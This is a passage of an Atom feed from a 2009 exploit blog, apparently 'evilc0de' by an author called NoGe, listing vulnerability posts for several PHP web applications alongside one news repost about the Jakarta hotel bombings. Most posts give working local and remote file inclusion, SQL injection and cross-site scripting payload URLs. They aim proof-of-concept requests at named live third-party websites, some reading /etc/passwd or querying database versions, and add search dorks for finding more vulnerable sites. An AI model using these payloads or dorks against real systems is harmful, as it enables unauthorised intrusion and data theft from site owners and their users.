height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-3548513816652450539</id><published>2009-07-29T01:29:00.001+07:00</published><updated>2009-07-29T01:32:26.884+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Now YOu Know eChiropractic Local File Inclusion Vuln</title><content type='html'>&lt;pre&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;[o] Now YOu Know eChiropractic Local File Inclusion Vulnerability&lt;br /&gt;&lt;/span&gt;Software : Now YOu Know eChiropractic&lt;br /&gt;Vendor   : http://www.echiropractic.net/ - http://www.nowyouknow.net/&lt;br /&gt;Author   : NoGe&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Vulnerable file&lt;/span&gt;&lt;br /&gt;index.php&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/index.php?file=[LFI]&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Proof of concept&lt;/span&gt;&lt;br /&gt;http://www.nowyouknow.net/index.php?file=../../../../../../../../../../../../../../../etc/passwd&lt;br /&gt;http://www.braile.net/index.php?file=../../../../../../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;"Now You Know Inc"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Notes&lt;/span&gt;&lt;br /&gt;this is a private script. many targets are in one IP address.&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-3548513816652450539?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/3548513816652450539/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=3548513816652450539' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3548513816652450539'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3548513816652450539'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/07/now-you-know-echiropractic-local-file.html' title='Now YOu Know eChiropractic Local File Inclusion Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-778724584400237788</id><published>2009-07-24T21:54:00.003+07:00</published><updated>2010-04-08T02:22:28.943+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Basilic 1.5.13 SQL Injection Vuln</title><content type='html'>&lt;pre&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;[o] Basilic 1.5.13 SQL Injection Vulnerability&lt;/span&gt;&lt;br /&gt;Software : Basilic version 1.5.13&lt;br /&gt;Vendor   : http://artis.imag.fr/Software/Basilic/&lt;br /&gt;Download : http://artis.imag.fr/Software/Basilic/basilic-1.5.13.tar.gz&lt;br /&gt;Author   : NoGe&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Vulnerable file&lt;/span&gt;&lt;br /&gt;index.php&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/index.php?idAuthor=[SQL]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Proof of concept&lt;/span&gt;&lt;br /&gt;http://secure.ntsg.umt.edu/publications/index.php?idAuthor=-31+union+select+1,version()--&lt;br /&gt;http://www.iarc.uaf.edu/publications/index.php?idAuthor=-19+union+select+1,version()--&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;"Powered by Basilic"&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-778724584400237788?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/778724584400237788/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=778724584400237788' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/778724584400237788'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/778724584400237788'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/07/basilic-1513-sql-injection-vuln.html' title='Basilic 1.5.13 SQL Injection Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-4761159836871905878</id><published>2009-07-24T10:17:00.004+07:00</published><updated>2009-07-24T21:54:02.469+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>e107 Plugin my_gallery 2.4.1 readfile() LFD Exploit</title><content type='html'>&lt;pre&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;[o] &lt;/span&gt;&lt;span style="font-weight: bold;" class="style15"&gt;e107 Plugin my_gallery 2.4.1 readfile() Local File Disclosure Exploit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;see the exploit in link below&lt;br /&gt;&lt;a href="http://milw0rm.com/exploits/9235"&gt;http://milw0rm.com/exploits/9235&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;"e107_plugins/my_gallery"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./NoGe&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-4761159836871905878?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/4761159836871905878/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=4761159836871905878' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/4761159836871905878'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/4761159836871905878'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/07/e107-plugin-mygallery-241-readfile-lfd.html' title='e107 Plugin my_gallery 2.4.1 readfile() LFD Exploit'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-3009781490853434085</id><published>2009-07-21T09:16:00.003+07:00</published><updated>2010-04-08T02:23:45.876+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>MiniCWB 2.3.0 Multiple RFI Vuln</title><content type='html'>&lt;pre&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;[o] MiniCWB 2.3.0 Multiple Remote File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software     : MiniCWB version 2.3.0&lt;br /&gt;Vendor       : http://www.grafxsoftware.com/&lt;br /&gt;Download : http://www.grafxsoftware.com/login.php?action=form&amp;amp;url=download.php&lt;br /&gt;Author      : NoGe&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Vulnerable file&lt;/span&gt;&lt;br /&gt;include($LANG.".extra.php");&lt;br /&gt;language/en.inc.php&lt;br /&gt;language/hu.inc.php&lt;br /&gt;language/no.inc.php&lt;br /&gt;language/ro.inc.php&lt;br /&gt;language/ru.inc.php&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/language/en.inc.php?LANG=[evilc0de]&lt;br /&gt;http://localhost/[path]/language/hu.inc.php?LANG=[evilc0de]&lt;br /&gt;http://localhost/[path]/language/no.inc.php?LANG=[evilc0de]&lt;br /&gt;http://localhost/[path]/language/ro.inc.php?LANG=[evilc0de]&lt;br /&gt;http://localhost/[path]/language/ru.inc.php?LANG=[evilc0de]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;"Powered by MiniCWB"&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-3009781490853434085?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/3009781490853434085/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=3009781490853434085' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3009781490853434085'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3009781490853434085'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/07/minicwb-230-multiple-rfi-vuln.html' title='MiniCWB 2.3.0 Multiple RFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-163948447037315913</id><published>2009-07-17T13:52:00.008+07:00</published><updated>2009-08-20T03:17:19.930+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='mixed'/><title type='text'>Jakarta Explosion, Friday July 17 2009</title><content type='html'>&lt;pre&gt;&lt;br /&gt;Bombs minutes apart ripped through two &lt;span class="yshortcuts" id="lw_1247810646_0"&gt;luxury hotels&lt;/span&gt; in Jakarta.&lt;br /&gt;the blasts at the J.W. Marriott and &lt;span class="yshortcuts" id="lw_1247810646_2"&gt;Ritz-Carlton&lt;/span&gt;&lt;br /&gt;hotels, located side-by-side in an upscale business district in the&lt;br /&gt;capital, blew out windows and scattered debris and glass across the&lt;br /&gt;street, kicking up a thick plume of smoke. Facades of both hotels were&lt;br /&gt;reduced to twisted metal.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_dxtzvQwAPwE/SmAjQlgKCyI/AAAAAAAAACg/vh35SwnJHKs/s1600-h/ledakan-luar.jpg"&gt;&lt;img style="cursor: pointer; width: 200px; height: 200px;" src="http://3.bp.blogspot.com/_dxtzvQwAPwE/SmAjQlgKCyI/AAAAAAAAACg/vh35SwnJHKs/s320/ledakan-luar.jpg" alt="" id="BLOGGER_PHOTO_ID_5359322324422757154" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;The Marriott, which was attacked in 2003 in a bombing blamed on&lt;br /&gt;Southeast Asian terror network &lt;span class="yshortcuts" id="lw_1247810646_3"&gt;Jemaah Islamiyah&lt;/span&gt;,&lt;br /&gt;was hit first, followed by the blast at the Ritz two minutes later. The&lt;br /&gt;attacks came just two weeks after presidential vote expected to&lt;br /&gt;re-elect incumbent &lt;span class="yshortcuts" id="lw_1247810646_4"&gt;Susilo Bambang Yudhoyono&lt;/span&gt; who has been&lt;br /&gt;credited with stabilizing a nation previously wracked by militancy.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_dxtzvQwAPwE/SmAi7CvgbuI/AAAAAAAAACQ/_-u94lnybQc/s1600-h/bomcaver.jpg"&gt;&lt;img style="cursor: pointer; width: 320px; height: 291px;" src="http://3.bp.blogspot.com/_dxtzvQwAPwE/SmAi7CvgbuI/AAAAAAAAACQ/_-u94lnybQc/s320/bomcaver.jpg" alt="" id="BLOGGER_PHOTO_ID_5359321954314645218" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Local media reported that two people were killed in another explosion&lt;br /&gt;in a car north Jakarta later Friday. Officials confirmed a blast but&lt;br /&gt;said it did not appear to be related.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_dxtzvQwAPwE/SmAjHtMdzqI/AAAAAAAAACY/GqSZ9snO86o/s1600-h/capt.51a46a5284284a8899f9c164fccdf977.aptopix_indonesia_explosions_jak102.jpg"&gt;&lt;img style="cursor: pointer; width: 320px; height: 223px;" src="http://2.bp.blogspot.com/_dxtzvQwAPwE/SmAjHtMdzqI/AAAAAAAAACY/GqSZ9snO86o/s320/capt.51a46a5284284a8899f9c164fccdf977.aptopix_indonesia_explosions_jak102.jpg" alt="" id="BLOGGER_PHOTO_ID_5359322171868827298" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;English football club Manchester United have cancelled their tour match&lt;br /&gt;in Jakarta after bomb explosions in the Indonesian capital&lt;br /&gt;Bombs exploded at the Jakarta Marriott and Ritz-Carlton, which was to&lt;br /&gt;host the Manchester United squad for four days from Saturday evening.&lt;br /&gt;&lt;br /&gt;The team was scheduled to play Indonesia Super League XI in an&lt;br /&gt;exhibition match in Jakarta Monday. The match was a part of Manchester&lt;br /&gt;United summer tour. They will arrive in Kuala Lumpur late Friday night&lt;br /&gt;to play a tour match against Malaysian XI at the Bukit Jalil Stadium.&lt;br /&gt;&lt;br /&gt;After Jakarta, they were scheduled to fly to Seoul Wednesday before&lt;br /&gt;concluding their four-stop trip in Hangzhou, China, next weekend. But&lt;br /&gt;now with the cancellation of Jakarta trip the tour is set for big&lt;br /&gt;changes.&lt;br /&gt;&lt;br /&gt;The Daily Telegraph reported that Manchester United officials reviewed&lt;br /&gt;the team's security situation and have decided to cancel the trip to&lt;br /&gt;Jakarta as a result of the terrorist attacks.&lt;br /&gt;&lt;br /&gt;"Following the explosions in Jakarta, one of which at the hotel the&lt;br /&gt;team were due to stay in, and based on advice received, the directors&lt;br /&gt;have informed the Indonesia FA that the club can not fulfil the fixture&lt;br /&gt;in Jakarta on the 2009 Asian Tour," United said in a statement.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_dxtzvQwAPwE/SmAkMg0ZSHI/AAAAAAAAACo/8Ku5mJe2uHA/s1600-h/Man-Utd-team-l-0607.jpg"&gt;&lt;img style="cursor: pointer; width: 320px; height: 214px;" src="http://2.bp.blogspot.com/_dxtzvQwAPwE/SmAkMg0ZSHI/AAAAAAAAACo/8Ku5mJe2uHA/s320/Man-Utd-team-l-0607.jpg" alt="" id="BLOGGER_PHOTO_ID_5359323353957615730" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-163948447037315913?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/163948447037315913/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=163948447037315913' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/163948447037315913'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/163948447037315913'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/07/jakarta-explosion-friday-july-17-2009.html' title='Jakarta Explosion, Friday July 17 2009'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_dxtzvQwAPwE/SmAjQlgKCyI/AAAAAAAAACg/vh35SwnJHKs/s72-c/ledakan-luar.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-1905765754242451465</id><published>2009-07-16T21:51:00.001+07:00</published><updated>2010-04-08T02:24:48.155+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>dB Masters Multimedia's Content Manager 4.5 SQL Injection Vuln</title><content type='html'>&lt;pre&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;[o] dB Masters Multimedia's Content Manager 4.5 SQL Injection Vulnerability&lt;br /&gt;&lt;/span&gt;Software : dB Masters Multimedia's Content Manager version 4.5&lt;br /&gt;Vendor   : http://www.dbmasters.net/&lt;br /&gt;Author   : NoGe&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Vulnerable file&lt;/span&gt;&lt;br /&gt;index.php&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/index.php?n=xx&amp;amp;id=[SQL]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Proof of Concept&lt;/span&gt;&lt;br /&gt;http://www.fosada.za.org/index.php?n=62&amp;amp;id=-57+union+select+1,version()--&lt;br /&gt;http://www.colourmebeautiful.com.au/index.php?n=1&amp;amp;id=-1+union+select+1,version()--&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;"Powered by dB Masters Multimedia's Content Manager"&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-1905765754242451465?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/1905765754242451465/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=1905765754242451465' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1905765754242451465'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1905765754242451465'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/07/db-masters-multimedias-content-manager.html' title='dB Masters Multimedia&apos;s Content Manager 4.5 SQL Injection Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-8763400561364302776</id><published>2009-07-16T21:44:00.003+07:00</published><updated>2010-04-08T02:25:15.665+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>OnePound Shop 1.x Blind SQL Injection &amp; Cross Site Scripting Vuln</title><content type='html'>&lt;pre&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;[o] OnePound Shop 1.x Blind SQL Injection &amp;amp; Cross Site Scripting Vulnerability&lt;/span&gt;&lt;br /&gt;Software : OnePound Shop version 1.x&lt;br /&gt;Vendor   : http://www.onepound.cn/&lt;br /&gt;Author   : NoGe&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Vulnerable file&lt;/span&gt;&lt;br /&gt;productsview.php&lt;br /&gt;categories.php&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/productsview.php?id=xx&amp;amp;proid=[SQL]&lt;br /&gt;http://localhost/[path]/productsview.php?id=xx&amp;amp;proid=[XSS]&lt;br /&gt;http://localhost/[path]/categories.php?pid=[XSS]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Proof of Concept&lt;/span&gt;&lt;br /&gt;http://www.tele-way.com/productsview.php?id=87&amp;amp;proid=129+and+substring(@@version,1,1)=5&lt;br /&gt;http://www.tele-way.com/productsview.php?id=87&amp;amp;proid=129+and+substring(@@version,1,1)=4&lt;br /&gt;http://www.tele-way.com/productsview.php?id=87&amp;amp;proid=[XSS]&lt;br /&gt;http://tonysbridal.net/categories.php?pid=[XSS]&lt;br /&gt;http://vendorhotspot.com/categories.php?pid=[XSS]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;"Powered by OnePound"&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-8763400561364302776?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/8763400561364302776/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=8763400561364302776' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/8763400561364302776'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/8763400561364302776'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/07/onepound-shop-1x-blind-sql-injection_16.html' title='OnePound Shop 1.x Blind SQL Injection &amp; Cross Site Scripting Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry></feed>
